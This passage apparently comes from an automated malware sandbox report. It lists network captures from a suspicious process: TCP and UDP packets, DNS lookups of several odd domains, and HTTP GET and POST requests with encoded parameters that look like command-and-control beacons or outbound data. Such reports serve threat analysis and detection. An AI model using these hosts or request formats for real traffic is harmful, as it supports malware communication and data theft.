                                                                                                                          Jan 15, 2025 18:17:42.949596882 CET8050028213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:42.949646950 CET5002880192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:43.866238117 CET5002880192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:44.879170895 CET5002980192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:44.939388990 CET8050029213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:44.939557076 CET5002980192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:44.957339048 CET5002980192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:44.962132931 CET8050029213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:45.532556057 CET8050029213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:45.532601118 CET8050029213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:45.532718897 CET5002980192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:46.469420910 CET5002980192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:47.489321947 CET5003080192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:47.494188070 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.494330883 CET5003080192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:47.511580944 CET5003080192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:47.516664028 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516710043 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516740084 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516799927 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516828060 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516855001 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516882896 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516911030 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:47.516943932 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:48.103812933 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:48.103951931 CET8050030213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:48.104082108 CET5003080192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:49.027812004 CET5003080192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.036081076 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.041177988 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.041306019 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.053545952 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.059381008 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653280020 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653325081 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653352976 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653384924 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653465986 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653491020 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653592110 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.653661013 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.659327984 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.664268970 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:55.785372019 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:55.790165901 CET805003285.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:55.790337086 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:55.807677984 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:55.812467098 CET805003285.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:57.314152956 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:57.319221973 CET805003285.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:57.319327116 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.334229946 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.339014053 CET805003385.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:58.339091063 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.362605095 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.367351055 CET805003385.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:59.875850916 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:59.882539034 CET805003385.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:59.882662058 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:00.894669056 CET5003480192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:01.064205885 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.064325094 CET5003480192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:01.080929995 CET5003480192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:01.085815907 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085829973 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085849047 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085859060 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085891962 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085901022 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085961103 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.086011887 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.086172104 CET805003485.159.66.93192.168.2.4

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 15, 2025 18:15:52.730135918 CET5484453192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:15:52.776927948 CET53548441.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:08.504482031 CET5839353192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:16:08.516546011 CET53583931.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:21.879847050 CET5645053192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:16:21.891055107 CET53564501.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:29.956666946 CET5421953192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:16:30.139853954 CET53542191.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:43.509780884 CET6533053192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:16:44.275736094 CET53653301.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:57.606507063 CET5255353192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:16:57.814291000 CET53525531.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:05.887130022 CET6452953192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:17:05.896148920 CET53645291.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:13.992167950 CET6103853192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:17:14.010452032 CET53610381.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:28.426510096 CET5538753192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:17:28.524152040 CET53553871.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:42.255425930 CET6198353192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:17:42.320882082 CET53619831.1.1.1192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:55.676601887 CET5484353192.168.2.41.1.1.1
                                                                                                                          Jan 15, 2025 18:17:55.780594110 CET53548431.1.1.1192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 15, 2025 18:15:52.730135918 CET192.168.2.41.1.1.10xd3aaStandard query (0)www.zucchini.proA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:08.504482031 CET192.168.2.41.1.1.10x9fabStandard query (0)www.vh5g.sbsA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:21.879847050 CET192.168.2.41.1.1.10x442fStandard query (0)www.v89ey584d.shopA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:29.956666946 CET192.168.2.41.1.1.10x73cdStandard query (0)www.actionhub.liveA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:43.509780884 CET192.168.2.41.1.1.10x9091Standard query (0)www.100millionjobs.africaA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:57.606507063 CET192.168.2.41.1.1.10x5a7dStandard query (0)www.x3kwqc5tye4vl90y.topA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:05.887130022 CET192.168.2.41.1.1.10x497aStandard query (0)www.hwak.liveA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:13.992167950 CET192.168.2.41.1.1.10x8965Standard query (0)www.qzsazi.infoA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:28.426510096 CET192.168.2.41.1.1.10xd94bStandard query (0)www.truckgoway.infoA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:42.255425930 CET192.168.2.41.1.1.10x62f5Standard query (0)www.aloezhealthcare.infoA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:55.676601887 CET192.168.2.41.1.1.10x1f27Standard query (0)www.letsbookcruise.xyzA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 15, 2025 18:15:52.776927948 CET1.1.1.1192.168.2.40xd3aaNo error (0)www.zucchini.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:15:52.776927948 CET1.1.1.1192.168.2.40xd3aaNo error (0)www.zucchini.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:08.516546011 CET1.1.1.1192.168.2.40x9fabNo error (0)www.vh5g.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:08.516546011 CET1.1.1.1192.168.2.40x9fabNo error (0)www.vh5g.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:21.891055107 CET1.1.1.1192.168.2.40x442fName error (3)www.v89ey584d.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:30.139853954 CET1.1.1.1192.168.2.40x73cdNo error (0)www.actionhub.live67.223.117.189A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:44.275736094 CET1.1.1.1192.168.2.40x9091No error (0)www.100millionjobs.africa100millionjobs.africaCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:44.275736094 CET1.1.1.1192.168.2.40x9091No error (0)100millionjobs.africa136.243.64.147A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:16:57.814291000 CET1.1.1.1192.168.2.40x5a7dName error (3)www.x3kwqc5tye4vl90y.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:05.896148920 CET1.1.1.1192.168.2.40x497aName error (3)www.hwak.livenonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:14.010452032 CET1.1.1.1192.168.2.40x8965No error (0)www.qzsazi.info47.83.1.90A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:28.524152040 CET1.1.1.1192.168.2.40xd94bNo error (0)www.truckgoway.infotruckgoway.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:28.524152040 CET1.1.1.1192.168.2.40xd94bNo error (0)truckgoway.info84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:42.320882082 CET1.1.1.1192.168.2.40x62f5No error (0)www.aloezhealthcare.info213.171.195.105A (IP address)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:55.780594110 CET1.1.1.1192.168.2.40x1f27No error (0)www.letsbookcruise.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:55.780594110 CET1.1.1.1192.168.2.40x1f27No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 15, 2025 18:17:55.780594110 CET1.1.1.1192.168.2.40x1f27No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • www.zucchini.pro
                                                                                                                          • www.vh5g.sbs
                                                                                                                          • www.actionhub.live
                                                                                                                          • www.100millionjobs.africa
                                                                                                                          • www.qzsazi.info
                                                                                                                          • www.truckgoway.info
                                                                                                                          • www.aloezhealthcare.info
                                                                                                                          • www.letsbookcruise.xyz

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44974213.248.169.48804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:15:52.802956104 CET383OUTGET /tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.zucchini.pro
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:15:58.465424061 CET372INHTTP/1.1 200 OK
                                                                                                                          content-type: text/html
                                                                                                                          date: Wed, 15 Jan 2025 17:15:58 GMT
                                                                                                                          content-length: 251
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 4e 57 54 3d 75 62 74 4c 53 7a 6c 26 56 30 3d 6d 77 35 45 4d 44 65 31 30 37 59 4a 54 71 75 6a 41 71 39 75 6e 7a 32 64 78 46 49 71 52 63 77 78 35 46 5a 56 31 34 77 4e 2b 77 57 6e 59 7a 2f 31 76 45 43 77 7a 39 71 58 30 35 32 33 72 56 41 48 56 62 43 6b 79 65 50 6d 31 61 4e 4c 43 4a 4e 36 6d 34 38 7a 77 77 46 47 59 68 49 61 61 41 70 68 52 64 59 53 31 4b 6c 31 42 69 59 53 77 63 54 35 6c 31 4c 39 4a 45 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw="}</script></head></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449839188.114.97.3804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:08.537873030 CET639OUTPOST /54nj/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/54nj/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 75 53 31 63 38 74 55 50 34 30 66 75 35 54 39 79 64 36 70 42 7a 62 42 6f 67 45 79 59 54 51 32 63 4b 68 79 69 6e 35 67 75 5a 4a 56 7a 36 68 46 34 48 41 76 37 4c 76 34 74 32 4e 74 63 64 64 4a 31 73 41 2b 39 69 59 42 6c 44 76 50 68 6e 4f 64 56 4c 73 39 38 76 73 49 74 42 33 5a 66 5a 2f 6d 45 41 6d 57 6c 2f 67 6a 58 6c 72 64 6d 64 38 6b 36 4b 78 30 66 6f 32 38 79 45 57 72 6f 43 30 6f 69 43 65 63 44 74 48 44 6e 73 31 38 77 34 55 51 71 41 2f 42 62 65 56 52 49 61 32 43 77 78 68 55 55 4e 4f 30 6f 31 54 46 41 62 42 72 53 6f 51 79 4f 41 42 4b 41 36 4c 38 4a 4e 43 34 45 34 41 36 61 52 51 3d 3d
                                                                                                                          Data Ascii: V0=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNO0o1TFAbBrSoQyOABKA6L8JNC4E4A6aRQ==
                                                                                                                          Jan 15, 2025 18:16:09.264993906 CET1079INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:09 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjVFFa5CzUa6XZiXL39Cbs1S1Aa8lJn6aPTQqR%2Fgb%2FwQ0unjC2l9wuPu%2FLd8fckeIYlHoORHpfGrYJ994Us5JNn8nub9oXU8u779RznMutPyOl7uKp25x%2FFocxVygog%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027830c0e2ea2b4-YUL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17819&min_rtt=17819&rtt_var=8909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=639&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Jan 15, 2025 18:16:09.265974998 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449858188.114.97.3804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:11.093838930 CET659OUTPOST /54nj/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/54nj/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 75 53 31 63 38 74 55 50 34 30 66 75 36 7a 4e 79 47 5a 42 42 6d 4c 42 6e 6a 45 79 59 42 51 32 59 4b 67 4f 69 6e 34 56 7a 5a 36 68 7a 37 42 56 34 47 42 76 37 49 76 34 74 39 74 74 6a 46 39 4a 45 73 41 79 31 69 5a 74 6c 44 75 72 68 6e 4c 35 56 4b 62 42 6a 2b 73 49 72 49 58 5a 42 58 66 6d 45 41 6d 57 6c 2f 67 32 41 6c 72 46 6d 64 4d 30 36 4b 54 51 41 69 57 38 31 51 47 72 6f 47 30 6f 6d 43 65 63 39 74 47 50 4e 73 32 45 77 34 55 67 71 42 72 74 59 4c 6c 52 30 51 57 44 53 32 44 4a 4b 56 64 35 68 7a 53 6c 48 44 42 76 6b 67 32 2f 55 52 77 72 58 6f 4c 59 36 51 46 78 77 31 44 48 54 4b 55 49 73 70 46 31 79 68 76 6f 32 45 4d 67 2f 6c 69 34 79 6b 6f 59 3d
                                                                                                                          Data Ascii: V0=uS1c8tUP40fu6zNyGZBBmLBnjEyYBQ2YKgOin4VzZ6hz7BV4GBv7Iv4t9ttjF9JEsAy1iZtlDurhnL5VKbBj+sIrIXZBXfmEAmWl/g2AlrFmdM06KTQAiW81QGroG0omCec9tGPNs2Ew4UgqBrtYLlR0QWDS2DJKVd5hzSlHDBvkg2/URwrXoLY6QFxw1DHTKUIspF1yhvo2EMg/li4ykoY=
                                                                                                                          Jan 15, 2025 18:16:11.730663061 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4In%2BoOjvQoZCR0blPPePCa8z87CjR7Sd69%2F1lea8QC9ksNC35P0ABJs6kllIzxilgngw9ntFLM7Usrq4cpF%2BO9qdP9lt7rjOdJN1tsrRi8wvmUjtSGHRdJpzolxsy4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027831bc8d7f26c-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8184&min_rtt=8184&rtt_var=4092&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=659&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></ht
                                                                                                                          Jan 15, 2025 18:16:11.730699062 CET12INData Raw: 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: ml>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449876188.114.97.3804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:13.650338888 CET10741OUTPOST /54nj/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/54nj/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
